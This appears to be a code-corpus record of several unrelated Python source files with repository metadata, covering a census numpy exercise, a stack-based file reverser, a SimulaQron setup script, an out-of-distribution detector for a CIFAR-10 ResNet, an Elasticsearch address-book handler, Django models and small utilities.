# -------------- # Importing header files import numpy as np import warnings warnings.filterwarnings('ignore') #New record new_record=[[50, 9, 4, 1, 0, 0, 40, 0]] #Reading file # data = np.genfromtxt(path, delimiter=",", skip_header=1) #Code starts here data = np.genfromtxt(path, delimiter = ",", skip_header = 1) census = np.concatenate((new_record,data),axis = 0) age = census[:,0] max_age = np.max(age) min_age = np.min(age) age_mean = np.mean(age) age_std = np.std(age) race_0 = census[census[:,2]==0] race_1 = census[census[:,2]==1] race_2 = census[census[:,2]==2] race_3 = census[census[:,3]==3] race_4 = census[census[:,4]==4] len_0 = len(race_0) len_1 = len(race_1) len_2 = len(race_2) len_3 = len(race_3) len_4 = len(race_4) a = [len_0, len_1, len_2, len_3, len_4] minority_race = min(a) senior_citizens = census[census[:,0]>60] working_hours_sum = senior_citizens.sum(axis=0)[6] senior_citizens_len = len(senior_citizens) avg_working_hours = working_hours_sum/senior_citizens_len print(round(avg_working_hours,2)) high = census[census[:,1]>10] low = census[census[:,1]<=10] avg_pay_high = round(np.mean(high[:,7]),2) avg_pay_low = round(np.mean(low[:,7]),2) print(avg_pay_high) print(avg_pay_low)
22.875
61
0.664325
# -------------- # Importing header files import numpy as np import warnings warnings.filterwarnings('ignore') #New record new_record=[[50, 9, 4, 1, 0, 0, 40, 0]] #Reading file # data = np.genfromtxt(path, delimiter=",", skip_header=1) #Code starts here data = np.genfromtxt(path, delimiter = ",", skip_header = 1) census = np.concatenate((new_record,data),axis = 0) age = census[:,0] max_age = np.max(age) min_age = np.min(age) age_mean = np.mean(age) age_std = np.std(age) race_0 = census[census[:,2]==0] race_1 = census[census[:,2]==1] race_2 = census[census[:,2]==2] race_3 = census[census[:,3]==3] race_4 = census[census[:,4]==4] len_0 = len(race_0) len_1 = len(race_1) len_2 = len(race_2) len_3 = len(race_3) len_4 = len(race_4) a = [len_0, len_1, len_2, len_3, len_4] minority_race = min(a) senior_citizens = census[census[:,0]>60] working_hours_sum = senior_citizens.sum(axis=0)[6] senior_citizens_len = len(senior_citizens) avg_working_hours = working_hours_sum/senior_citizens_len print(round(avg_working_hours,2)) high = census[census[:,1]>10] low = census[census[:,1]<=10] avg_pay_high = round(np.mean(high[:,7]),2) avg_pay_low = round(np.mean(low[:,7]),2) print(avg_pay_high) print(avg_pay_low)
0
0
0
4165bf5b7d8a9d455b4c62503f72f9ecebf7e6ba
509
py
Python
CHAPTER 06 (stacks_queues_deques)/reverse_file_using_stack.py
ahammadshawki8/Data-Structures-Algorithms-in-Python-
fc18b54128cd5bc7639a14999d8f990190b524eb
[ "MIT" ]
null
null
null
CHAPTER 06 (stacks_queues_deques)/reverse_file_using_stack.py
ahammadshawki8/Data-Structures-Algorithms-in-Python-
fc18b54128cd5bc7639a14999d8f990190b524eb
[ "MIT" ]
null
null
null
CHAPTER 06 (stacks_queues_deques)/reverse_file_using_stack.py
ahammadshawki8/Data-Structures-Algorithms-in-Python-
fc18b54128cd5bc7639a14999d8f990190b524eb
[ "MIT" ]
null
null
null
from stack_class import * def reverse_file(path): """Overwrite given file using its context line-by-line reversed""" s=ArrayStack() with open(path,"r") as original: for line in original: s.push(line.rstrip("\n")) # removing newline characters # overwrite the contents in LIFO order with open(path,"w") as new: while not s.is_empty(): new.write(s.pop()+"\n") # re-insert newline characters. return "Reversed" print(reverse_file("sample.txt"))
29.941176
70
0.642436
from stack_class import * def reverse_file(path): """Overwrite given file using its context line-by-line reversed""" s=ArrayStack() with open(path,"r") as original: for line in original: s.push(line.rstrip("\n")) # removing newline characters # overwrite the contents in LIFO order with open(path,"w") as new: while not s.is_empty(): new.write(s.pop()+"\n") # re-insert newline characters. return "Reversed" print(reverse_file("sample.txt"))
0
0
0
6500eec5e3f781f090b684bdb20725e228725ab7
816
py
Python
simulaqron/tests/performance/ring_teleport/configure_ring.py
Doomsk/SimulaQron
09bd81730e31c7642a0fece8ae7d518820fe57eb
[ "BSD-3-Clause" ]
69
2018-10-14T10:32:34.000Z
2022-03-08T10:28:15.000Z
simulaqron/tests/performance/ring_teleport/configure_ring.py
Doomsk/SimulaQron
09bd81730e31c7642a0fece8ae7d518820fe57eb
[ "BSD-3-Clause" ]
121
2018-10-03T13:57:44.000Z
2021-12-17T17:36:39.000Z
simulaqron/tests/performance/ring_teleport/configure_ring.py
Doomsk/SimulaQron
09bd81730e31c7642a0fece8ae7d518820fe57eb
[ "BSD-3-Clause" ]
43
2018-10-10T15:53:28.000Z
2022-03-31T16:52:55.000Z
import sys import os from simulaqron.toolbox import get_simulaqron_path # Get path to SimulaQron folder simulaqron_path = get_simulaqron_path.main() tot_nr = int(sys.argv[1]) # configure run files for nodes with open("run.sh", "w") as f: f.write("#!/bin/sh\n\n") for i in range(tot_nr - 1): f.write("python3 node.py {} {} &\n".format(i, tot_nr)) f.write("python3 node.py {} {}\n".format(tot_nr - 1, tot_nr)) with open("run_v2.sh", "w") as f: f.write("#!/bin/sh\n\n") for i in range(tot_nr - 1): f.write("python3 node_v2.py {} {} &\n".format(i, tot_nr)) f.write("python3 node_v2.py {} {}\n".format(tot_nr - 1, tot_nr)) # configure network nodes = "".join(["n" + str(i) + " " for i in range(tot_nr)]) os.system("python3 " + simulaqron_path + "configFiles.py " + nodes)
27.2
68
0.627451
import sys import os from simulaqron.toolbox import get_simulaqron_path # Get path to SimulaQron folder simulaqron_path = get_simulaqron_path.main() tot_nr = int(sys.argv[1]) # configure run files for nodes with open("run.sh", "w") as f: f.write("#!/bin/sh\n\n") for i in range(tot_nr - 1): f.write("python3 node.py {} {} &\n".format(i, tot_nr)) f.write("python3 node.py {} {}\n".format(tot_nr - 1, tot_nr)) with open("run_v2.sh", "w") as f: f.write("#!/bin/sh\n\n") for i in range(tot_nr - 1): f.write("python3 node_v2.py {} {} &\n".format(i, tot_nr)) f.write("python3 node_v2.py {} {}\n".format(tot_nr - 1, tot_nr)) # configure network nodes = "".join(["n" + str(i) + " " for i in range(tot_nr)]) os.system("python3 " + simulaqron_path + "configFiles.py " + nodes)
0
0
0
3455b79313232342209d06b8958b01bacb4d6b24
181
py
Python
popupdict/util/__init__.py
hantaotaohan/popup-dict
9eb05fd9797a14323c9b1166f916778b32e933bc
[ "MIT" ]
85
2018-02-23T07:16:27.000Z
2022-03-26T19:53:48.000Z
popupdict/util/__init__.py
glMa7/popup-dict
dbf9121aa63d65095bd848a582595e1b03327418
[ "MIT" ]
12
2018-02-23T07:45:34.000Z
2020-03-10T03:20:03.000Z
popupdict/util/__init__.py
glMa7/popup-dict
dbf9121aa63d65095bd848a582595e1b03327418
[ "MIT" ]
16
2018-01-02T02:07:50.000Z
2021-12-17T08:01:00.000Z
from .selection import Selection from .logging import logger from .dir import config_dir, cache_dir __all__ = [ 'Selection', 'logger', 'config_dir', 'cache_dir', ]
16.454545
38
0.685083
from .selection import Selection from .logging import logger from .dir import config_dir, cache_dir __all__ = [ 'Selection', 'logger', 'config_dir', 'cache_dir', ]
0
0
0
33fc243f69957eb951b7bee3d0b96740c540016f
13,978
py
Python
classification/CIFAR/gram_matrics.py
warner-benjamin/vos
1f6844caeb2985f875b446f284bcfcfb8f9bba0e
[ "Apache-2.0" ]
174
2022-02-03T04:45:23.000Z
2022-03-31T06:04:23.000Z
classification/CIFAR/gram_matrics.py
warner-benjamin/vos
1f6844caeb2985f875b446f284bcfcfb8f9bba0e
[ "Apache-2.0" ]
19
2022-02-08T14:48:43.000Z
2022-03-31T08:48:05.000Z
classification/CIFAR/gram_matrics.py
warner-benjamin/vos
1f6844caeb2985f875b446f284bcfcfb8f9bba0e
[ "Apache-2.0" ]
24
2022-02-04T14:16:29.000Z
2022-03-26T12:13:06.000Z
from __future__ import division,print_function #matplotlib inline #load_ext autoreload #autoreload 2 import sys from tqdm import tqdm_notebook as tqdm import random import matplotlib.pyplot as plt import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.nn.init as init from torch.autograd import Variable, grad from torchvision import datasets, transforms from torch.nn.parameter import Parameter import calculate_log as callog import warnings warnings.filterwarnings('ignore') torch.cuda.set_device(0) #Select the GPU torch_model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes=10) torch_model.load('/nobackup-slow/dataset/my_xfdu/resnet_cifar10.pth') torch_model.cuda() torch_model.params = list(torch_model.parameters()) torch_model.eval() print("Done") batch_size = 128 mean = np.array([[0.4914, 0.4822, 0.4465]]).T std = np.array([[0.2023, 0.1994, 0.2010]]).T normalize = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), normalize ]) transform_test = transforms.Compose([ transforms.CenterCrop(size=(32, 32)), transforms.ToTensor(), normalize ]) train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=True, download=True, transform=transform_train), batch_size=batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=False, transform=transform_test), batch_size=batch_size) data_train = list(torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=True, download=True, transform=transform_test), batch_size=1, shuffle=False)) data = list(torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=False, download=True, transform=transform_test), batch_size=1, shuffle=False)) torch_model.eval() # correct = 0 # total = 0 # for x,y in test_loader: # x = x.cuda() # y = y.numpy() # correct += (y==np.argmax(torch_model(x).detach().cpu().numpy(),axis=1)).sum() # total += y.shape[0] # print("Accuracy: ",correct/total) cifar100 = list(torch.utils.data.DataLoader( datasets.CIFAR100('/nobackup-slow/dataset/cifarpy', train=False, download=True, transform=transform_test), batch_size=1, shuffle=True)) train_preds = [] train_confs = [] train_logits = [] for idx in range(0, len(data_train), 128): batch = torch.squeeze(torch.stack([x[0] for x in data_train[idx:idx + 128]]), dim=1).cuda() logits = torch_model(batch) confs = F.softmax(logits, dim=1).cpu().detach().numpy() preds = np.argmax(confs, axis=1) logits = (logits.cpu().detach().numpy()) train_confs.extend(np.max(confs, axis=1)) train_preds.extend(preds) train_logits.extend(logits) print("Done") test_preds = [] test_confs = [] test_logits = [] for idx in range(0, len(data), 128): batch = torch.squeeze(torch.stack([x[0] for x in data[idx:idx + 128]]), dim=1).cuda() logits = torch_model(batch) confs = F.softmax(logits, dim=1).cpu().detach().numpy() preds = np.argmax(confs, axis=1) logits = (logits.cpu().detach().numpy()) test_confs.extend(np.max(confs, axis=1)) test_preds.extend(preds) test_logits.extend(logits) print("Done") import calculate_log as callog detector = Detector() detector.compute_minmaxs(data_train, POWERS=range(1, 11)) detector.compute_test_deviations(POWERS=range(1, 11)) print("CIFAR-100") c100_results = detector.compute_ood_deviations(cifar100,POWERS=range(1,11))
33.440191
136
0.609744
from __future__ import division,print_function #matplotlib inline #load_ext autoreload #autoreload 2 import sys from tqdm import tqdm_notebook as tqdm import random import matplotlib.pyplot as plt import math import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import torch.nn.init as init from torch.autograd import Variable, grad from torchvision import datasets, transforms from torch.nn.parameter import Parameter import calculate_log as callog import warnings warnings.filterwarnings('ignore') torch.cuda.set_device(0) #Select the GPU def conv3x3(in_planes, out_planes, stride=1): return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False) class BasicBlock(nn.Module): expansion = 1 def __init__(self, in_planes, planes, stride=1): super(BasicBlock, self).__init__() self.conv1 = conv3x3(in_planes, planes, stride) self.bn1 = nn.BatchNorm2d(planes) self.conv2 = conv3x3(planes, planes) self.bn2 = nn.BatchNorm2d(planes) self.shortcut = nn.Sequential() if stride != 1 or in_planes != self.expansion * planes: self.shortcut = nn.Sequential( nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False), nn.BatchNorm2d(self.expansion * planes) ) def forward(self, x): t = self.conv1(x) out = F.relu(self.bn1(t)) torch_model.record(t) torch_model.record(out) t = self.conv2(out) out = self.bn2(self.conv2(out)) torch_model.record(t) torch_model.record(out) t = self.shortcut(x) out += t torch_model.record(t) out = F.relu(out) torch_model.record(out) return out class ResNet(nn.Module): def __init__(self, block, num_blocks, num_classes=10): super(ResNet, self).__init__() self.in_planes = 64 self.conv1 = conv3x3(3, 64) self.bn1 = nn.BatchNorm2d(64) self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1) self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2) self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2) self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2) self.linear = nn.Linear(512 * block.expansion, num_classes) self.collecting = False def _make_layer(self, block, planes, num_blocks, stride): strides = [stride] + [1] * (num_blocks - 1) layers = [] for stride in strides: layers.append(block(self.in_planes, planes, stride)) self.in_planes = planes * block.expansion return nn.Sequential(*layers) def forward(self, x): out = F.relu(self.bn1(self.conv1(x))) out = self.layer1(out) out = self.layer2(out) out = self.layer3(out) out = self.layer4(out) out = F.avg_pool2d(out, 4) out = out.view(out.size(0), -1) y = self.linear(out) return y def record(self, t): if self.collecting: self.gram_feats.append(t) def gram_feature_list(self, x): self.collecting = True self.gram_feats = [] self.forward(x) self.collecting = False temp = self.gram_feats self.gram_feats = [] return temp def load(self, path="resnet_cifar10.pth"): tm = torch.load(path, map_location="cpu") self.load_state_dict(tm) def get_min_max(self, data, power): mins = [] maxs = [] for i in range(0, len(data), 128): batch = data[i:i + 128].cuda() feat_list = self.gram_feature_list(batch) for L, feat_L in enumerate(feat_list):#96, x, x, x if L == len(mins): mins.append([None] * len(power)) maxs.append([None] * len(power)) for p, P in enumerate(power): g_p = G_p(feat_L, P) current_min = g_p.min(dim=0, keepdim=True)[0] breakpoint() current_max = g_p.max(dim=0, keepdim=True)[0] if mins[L][p] is None: mins[L][p] = current_min maxs[L][p] = current_max else: mins[L][p] = torch.min(current_min, mins[L][p]) maxs[L][p] = torch.max(current_max, maxs[L][p]) # breakpoint() return mins, maxs def get_deviations(self, data, power, mins, maxs): deviations = [] for i in range(0, len(data), 128): batch = data[i:i + 128].cuda() feat_list = self.gram_feature_list(batch) batch_deviations = [] for L, feat_L in enumerate(feat_list): dev = 0 for p, P in enumerate(power): g_p = G_p(feat_L, P) dev += (F.relu(mins[L][p] - g_p) / torch.abs(mins[L][p] + 10 ** -6)).sum(dim=1, keepdim=True) dev += (F.relu(g_p - maxs[L][p]) / torch.abs(maxs[L][p] + 10 ** -6)).sum(dim=1, keepdim=True) batch_deviations.append(dev.cpu().detach().numpy()) batch_deviations = np.concatenate(batch_deviations, axis=1) deviations.append(batch_deviations) deviations = np.concatenate(deviations, axis=0) return deviations torch_model = ResNet(BasicBlock, [3, 4, 6, 3], num_classes=10) torch_model.load('/nobackup-slow/dataset/my_xfdu/resnet_cifar10.pth') torch_model.cuda() torch_model.params = list(torch_model.parameters()) torch_model.eval() print("Done") batch_size = 128 mean = np.array([[0.4914, 0.4822, 0.4465]]).T std = np.array([[0.2023, 0.1994, 0.2010]]).T normalize = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), normalize ]) transform_test = transforms.Compose([ transforms.CenterCrop(size=(32, 32)), transforms.ToTensor(), normalize ]) train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=True, download=True, transform=transform_train), batch_size=batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=False, transform=transform_test), batch_size=batch_size) data_train = list(torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=True, download=True, transform=transform_test), batch_size=1, shuffle=False)) data = list(torch.utils.data.DataLoader( datasets.CIFAR10('/nobackup-slow/dataset/cifarpy', train=False, download=True, transform=transform_test), batch_size=1, shuffle=False)) torch_model.eval() # correct = 0 # total = 0 # for x,y in test_loader: # x = x.cuda() # y = y.numpy() # correct += (y==np.argmax(torch_model(x).detach().cpu().numpy(),axis=1)).sum() # total += y.shape[0] # print("Accuracy: ",correct/total) cifar100 = list(torch.utils.data.DataLoader( datasets.CIFAR100('/nobackup-slow/dataset/cifarpy', train=False, download=True, transform=transform_test), batch_size=1, shuffle=True)) train_preds = [] train_confs = [] train_logits = [] for idx in range(0, len(data_train), 128): batch = torch.squeeze(torch.stack([x[0] for x in data_train[idx:idx + 128]]), dim=1).cuda() logits = torch_model(batch) confs = F.softmax(logits, dim=1).cpu().detach().numpy() preds = np.argmax(confs, axis=1) logits = (logits.cpu().detach().numpy()) train_confs.extend(np.max(confs, axis=1)) train_preds.extend(preds) train_logits.extend(logits) print("Done") test_preds = [] test_confs = [] test_logits = [] for idx in range(0, len(data), 128): batch = torch.squeeze(torch.stack([x[0] for x in data[idx:idx + 128]]), dim=1).cuda() logits = torch_model(batch) confs = F.softmax(logits, dim=1).cpu().detach().numpy() preds = np.argmax(confs, axis=1) logits = (logits.cpu().detach().numpy()) test_confs.extend(np.max(confs, axis=1)) test_preds.extend(preds) test_logits.extend(logits) print("Done") import calculate_log as callog def detect(all_test_deviations, all_ood_deviations, verbose=True, normalize=True): average_results = {} for i in range(1, 11): random.seed(i) validation_indices = random.sample(range(len(all_test_deviations)), int(0.1 * len(all_test_deviations))) test_indices = sorted(list(set(range(len(all_test_deviations))) - set(validation_indices))) validation = all_test_deviations[validation_indices] test_deviations = all_test_deviations[test_indices] t95 = validation.mean(axis=0) + 10 ** -7 if not normalize: t95 = np.ones_like(t95) test_deviations = (test_deviations / t95[np.newaxis, :]).sum(axis=1) ood_deviations = (all_ood_deviations / t95[np.newaxis, :]).sum(axis=1) results = callog.compute_metric(-test_deviations, -ood_deviations) for m in results: average_results[m] = average_results.get(m, 0) + results[m] for m in average_results: average_results[m] /= i if verbose: callog.print_results(average_results) return average_results def cpu(ob): for i in range(len(ob)): for j in range(len(ob[i])): ob[i][j] = ob[i][j].cpu() return ob def cuda(ob): for i in range(len(ob)): for j in range(len(ob[i])): ob[i][j] = ob[i][j].cuda() return ob class Detector: def __init__(self): self.all_test_deviations = None self.mins = {} self.maxs = {} self.classes = range(10) def compute_minmaxs(self, data_train, POWERS=[10]): for PRED in tqdm(self.classes): train_indices = np.where(np.array(train_preds) == PRED)[0] train_PRED = torch.squeeze(torch.stack([data_train[i][0] for i in train_indices]), dim=1) mins, maxs = torch_model.get_min_max(train_PRED, power=POWERS) self.mins[PRED] = cpu(mins) self.maxs[PRED] = cpu(maxs) torch.cuda.empty_cache() def compute_test_deviations(self, POWERS=[10]): all_test_deviations = None test_classes = [] for PRED in tqdm(self.classes): test_indices = np.where(np.array(test_preds) == PRED)[0] test_PRED = torch.squeeze(torch.stack([data[i][0] for i in test_indices]), dim=1) test_confs_PRED = np.array([test_confs[i] for i in test_indices]) test_classes.extend([PRED] * len(test_indices)) mins = cuda(self.mins[PRED]) maxs = cuda(self.maxs[PRED]) test_deviations = torch_model.get_deviations(test_PRED, power=POWERS, mins=mins, maxs=maxs) / test_confs_PRED[:, np.newaxis] cpu(mins) cpu(maxs) if all_test_deviations is None: all_test_deviations = test_deviations else: all_test_deviations = np.concatenate([all_test_deviations, test_deviations], axis=0) torch.cuda.empty_cache() self.all_test_deviations = all_test_deviations self.test_classes = np.array(test_classes) def compute_ood_deviations(self, ood, POWERS=[10]): ood_preds = [] ood_confs = [] for idx in range(0, len(ood), 128): batch = torch.squeeze(torch.stack([x[0] for x in ood[idx:idx + 128]]), dim=1).cuda() logits = torch_model(batch) confs = F.softmax(logits, dim=1).cpu().detach().numpy() preds = np.argmax(confs, axis=1) ood_confs.extend(np.max(confs, axis=1)) ood_preds.extend(preds) torch.cuda.empty_cache() print("Done") ood_classes = [] all_ood_deviations = None for PRED in tqdm(self.classes): ood_indices = np.where(np.array(ood_preds) == PRED)[0] if len(ood_indices) == 0: continue ood_classes.extend([PRED] * len(ood_indices)) ood_PRED = torch.squeeze(torch.stack([ood[i][0] for i in ood_indices]), dim=1) ood_confs_PRED = np.array([ood_confs[i] for i in ood_indices]) mins = cuda(self.mins[PRED]) maxs = cuda(self.maxs[PRED]) ood_deviations = torch_model.get_deviations(ood_PRED, power=POWERS, mins=mins, maxs=maxs) / ood_confs_PRED[ :, np.newaxis] cpu(self.mins[PRED]) cpu(self.maxs[PRED]) if all_ood_deviations is None: all_ood_deviations = ood_deviations else: all_ood_deviations = np.concatenate([all_ood_deviations, ood_deviations], axis=0) torch.cuda.empty_cache() self.ood_classes = np.array(ood_classes) breakpoint() average_results = detect(self.all_test_deviations, all_ood_deviations) return average_results, self.all_test_deviations, all_ood_deviations def G_p(ob, p): temp = ob.detach() temp = temp ** p temp = temp.reshape(temp.shape[0], temp.shape[1], -1) temp = ((torch.matmul(temp, temp.transpose(dim0=2, dim1=1)))).sum(dim=2) temp = (temp.sign() * torch.abs(temp) ** (1 / p)).reshape(temp.shape[0], -1) return temp detector = Detector() detector.compute_minmaxs(data_train, POWERS=range(1, 11)) detector.compute_test_deviations(POWERS=range(1, 11)) print("CIFAR-100") c100_results = detector.compute_ood_deviations(cifar100,POWERS=range(1,11))
9,549
76
506
668413f0ce3cd197c88e2f927c1dbf7519e7a5cb
1,597
py
Python
LinkMeBot/utils.py
mdlss/PlayStoreLinks_Bot
3c4bec4594c9670c7a3b88848cdc59c988c7f454
[ "MIT" ]
null
null
null
LinkMeBot/utils.py
mdlss/PlayStoreLinks_Bot
3c4bec4594c9670c7a3b88848cdc59c988c7f454
[ "MIT" ]
null
null
null
LinkMeBot/utils.py
mdlss/PlayStoreLinks_Bot
3c4bec4594c9670c7a3b88848cdc59c988c7f454
[ "MIT" ]
null
null
null
import logging import math from misaka import Markdown, HtmlRenderer from lxml.html import fromstring # https://stackoverflow.com/a/3155023 millnames = ['',' thousand',' million',' billion',' trillion']
33.270833
121
0.72511
import logging import math from misaka import Markdown, HtmlRenderer from lxml.html import fromstring def make_logger(logger_name, logfile, loggin_level=logging.DEBUG): logger = logging.getLogger(logger_name) logger.setLevel(loggin_level) formatter = logging.Formatter('%(levelname)s - %(name)s - %(asctime)s - %(message)s', '%Y-%m-%d %H:%M:%S') fh = logging.FileHandler(logfile) fh.setLevel(loggin_level) fh.setFormatter(formatter) ch = logging.StreamHandler() ch.setFormatter(formatter) logger.addHandler(fh) logger.addHandler(ch) return logger def get_text_from_markdown(markdown_text): renderer = HtmlRenderer() markdown = Markdown(renderer, extensions=('tables', 'autolink', 'strikethrough', 'quote', 'superscript', 'fenced-code')) html = markdown(markdown_text) parsed_html = fromstring(html) # remove quoted text [x.getparent().remove(x) for x in parsed_html.xpath('//blockquote')] # remove automatically added links for link in parsed_html.xpath('//a'): if link.text_content() == link.get('href'): link.getparent().remove(link) text = ''.join(parsed_html.text_content()).strip() return text # https://stackoverflow.com/a/3155023 millnames = ['',' thousand',' million',' billion',' trillion'] def human_readable_download_number(download_number_string): download_number_string = download_number_string.split("-")[0].replace(',','').strip() n = float(download_number_string) millidx = max(0,min(len(millnames)-1, int(math.floor(0 if n == 0 else math.log10(abs(n))/3)))) return '{:.0f}{}'.format(n / 10**(3 * millidx), millnames[millidx])
1,325
0
68
b88fd5088d5c6562e9e754916376f77c12018147
3,004
py
Python
handling.py
alnordst/address-book-api
4385512ea5d1fdfd153160f2de2e6874890acd70
[ "Apache-2.0" ]
null
null
null
handling.py
alnordst/address-book-api
4385512ea5d1fdfd153160f2de2e6874890acd70
[ "Apache-2.0" ]
null
null
null
handling.py
alnordst/address-book-api
4385512ea5d1fdfd153160f2de2e6874890acd70
[ "Apache-2.0" ]
null
null
null
from flask import Flask from elasticsearch import Elasticsearch from contact import Contact class Handler(object): """ Handles operations on elasticsearch. """ def list_contacts(self, arguments): """ Returns a list of contacts or False. """ try: self.es.indices.refresh(index = self.index_name) res = self.es.search(index = self.index_name, body = { "from": arguments["page"] * arguments["pageSize"], "size": arguments["pageSize"], "query": arguments["query"] }) return res['hits']['hits'] except: return False def create_contact(self, form): """ Creates contact from form data. Returns True if successful. """ try: if self._get_contact(form['name']): #contact by that name exists return False else: contact = Contact(form) res = self.es.index(index = self.index_name, doc_type = '_doc', body = str(contact)) return res['result'] == 'created' except: return False def list_a_contact(self, name): """ Returns data on a single contact identified by name. """ try: return self._get_contact(name)['_source'] except: return False def update_contact(self, form): """ Update a contact using form data. Returns True if successful. """ try: if self.delete_contact(form['name']): return self.create_contact(form) else: return False except: return False def delete_contact(self, name): """ Delete a contact identified by name. Returns True if successful. """ try: contact_id = self._get_contact(name)['_id'] res = self.es.delete(index = self.index_name, doc_type = '_doc', id = contact_id) return res['result'] == 'deleted' except: return False
29.165049
79
0.515313
from flask import Flask from elasticsearch import Elasticsearch from contact import Contact class Handler(object): """ Handles operations on elasticsearch. """ def __init__(self, index_name, port = 9200, wipe_index = False): self.index_name = index_name self.es = Elasticsearch(port = port) if wipe_index and self.es.indices.exists(self.index_name): self.es.indices.delete(index = self.index_name) if not self.es.indices.exists(self.index_name): self.es.indices.create(index = self.index_name) def list_contacts(self, arguments): """ Returns a list of contacts or False. """ try: self.es.indices.refresh(index = self.index_name) res = self.es.search(index = self.index_name, body = { "from": arguments["page"] * arguments["pageSize"], "size": arguments["pageSize"], "query": arguments["query"] }) return res['hits']['hits'] except: return False def create_contact(self, form): """ Creates contact from form data. Returns True if successful. """ try: if self._get_contact(form['name']): #contact by that name exists return False else: contact = Contact(form) res = self.es.index(index = self.index_name, doc_type = '_doc', body = str(contact)) return res['result'] == 'created' except: return False def list_a_contact(self, name): """ Returns data on a single contact identified by name. """ try: return self._get_contact(name)['_source'] except: return False def update_contact(self, form): """ Update a contact using form data. Returns True if successful. """ try: if self.delete_contact(form['name']): return self.create_contact(form) else: return False except: return False def delete_contact(self, name): """ Delete a contact identified by name. Returns True if successful. """ try: contact_id = self._get_contact(name)['_id'] res = self.es.delete(index = self.index_name, doc_type = '_doc', id = contact_id) return res['result'] == 'deleted' except: return False def _get_contact(self, name): try: self.es.indices.refresh(index = self.index_name) res = self.es.search(index = self.index_name, body = { "query": { "match": { "name": name } } }) return res['hits']['hits'][0] except: return False
752
0
54
3e1ac6e8a54a6c16c3f79943e80cd2d3572d84bc
1,671
py
Python
temp/models.py
oteejay/lms
be351c8ec7aee1f81dede6fcf4292c1ecad31c60
[ "MIT" ]
null
null
null
temp/models.py
oteejay/lms
be351c8ec7aee1f81dede6fcf4292c1ecad31c60
[ "MIT" ]
11
2020-06-05T22:33:23.000Z
2022-03-11T23:56:46.000Z
temp/models.py
oteejay/lms
be351c8ec7aee1f81dede6fcf4292c1ecad31c60
[ "MIT" ]
null
null
null
from django.db import models from django.contrib.auth.models import User # Create your models here.
33.42
105
0.618791
from django.db import models from django.contrib.auth.models import User # Create your models here. def upload_location(instance, filename): return "%s/%s/%s" %('jtgreen', 'temp', filename) class TempUser(models.Model): user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='tempusers') designation = models.CharField(max_length=15, default='Installer', choices=[ ('Installer', 'Installer'), ('Master', 'Master'), ('Personel', 'Personel'), ('Agent', 'Agent') ]) used = models.BooleanField(default=False) cv = models.FileField(upload_to=upload_location, blank=True, null=True) class Invitation(models.Model): email = models.EmailField() designation = models.CharField(max_length=15, default='Installer', choices=[ ('Installer', 'Installer'), ('Master', 'Master'), ('Personel', 'Personel'), ('Agent', 'Agent') ]) used = models.BooleanField(default=False) token = models.CharField(max_length=254) inviter_id = models.IntegerField(blank=True) date_created = models.DateTimeField(auto_now=False, auto_now_add=True) created_by = models.ForeignKey(User, on_delete=models.DO_NOTHING, related_name='created_invitations') class PasswordReset(models.Model): email = models.EmailField() used = models.BooleanField(default=False) token = models.CharField(max_length=254) date_created = models.DateTimeField(auto_now=False, auto_now_add=True)
72
1,391
92
0d89603cb6143b26a131f84180a888c6ee7dfc8b
279
py
Python
Early/copyField_offices.py
adambreznicky/smudge_python
af7ba221890253ac6fe7f38691b351861f8b3d96
[ "MIT" ]
1
2017-05-24T02:05:20.000Z
2017-05-24T02:05:20.000Z
historic/copyField_offices.py
adambreznicky/smudge_python
af7ba221890253ac6fe7f38691b351861f8b3d96
[ "MIT" ]
null
null
null
historic/copyField_offices.py
adambreznicky/smudge_python
af7ba221890253ac6fe7f38691b351861f8b3d96
[ "MIT" ]
null
null
null
import arcpy source = "C:\\TxDOT\\Shapefiles\\District_Offices.shp" outputcopy = "T:\\DATAMGT\\MAPPING\\Personal Folders\\Adam\\District_Offices.shp" copyPhone()
34.875
81
0.752688
import arcpy source = "C:\\TxDOT\\Shapefiles\\District_Offices.shp" outputcopy = "T:\\DATAMGT\\MAPPING\\Personal Folders\\Adam\\District_Offices.shp" def copyPhone(): arcpy.JoinField_management(outputcopy, "Address", source, "Address", ["Phone"]) return "complete" copyPhone()
95
0
22
0e5c3c46f6c668faf01c3b0e96efc84b5cd1661c
5,095
py
Python
novmpy/vm.py
Dy-Baby/NoVmpy
49b13f5c9e5f4d3d4931e52836ee526996cea557
[ "BSD-3-Clause" ]
null
null
null
novmpy/vm.py
Dy-Baby/NoVmpy
49b13f5c9e5f4d3d4931e52836ee526996cea557
[ "BSD-3-Clause" ]
null
null
null
novmpy/vm.py
Dy-Baby/NoVmpy
49b13f5c9e5f4d3d4931e52836ee526996cea557
[ "BSD-3-Clause" ]
null
null
null
from novmpy.bridge import * from capstone import * from capstone.x86 import * from novmpy.x86_deobf import * from novmpy.match_helper import *
44.304348
138
0.479686
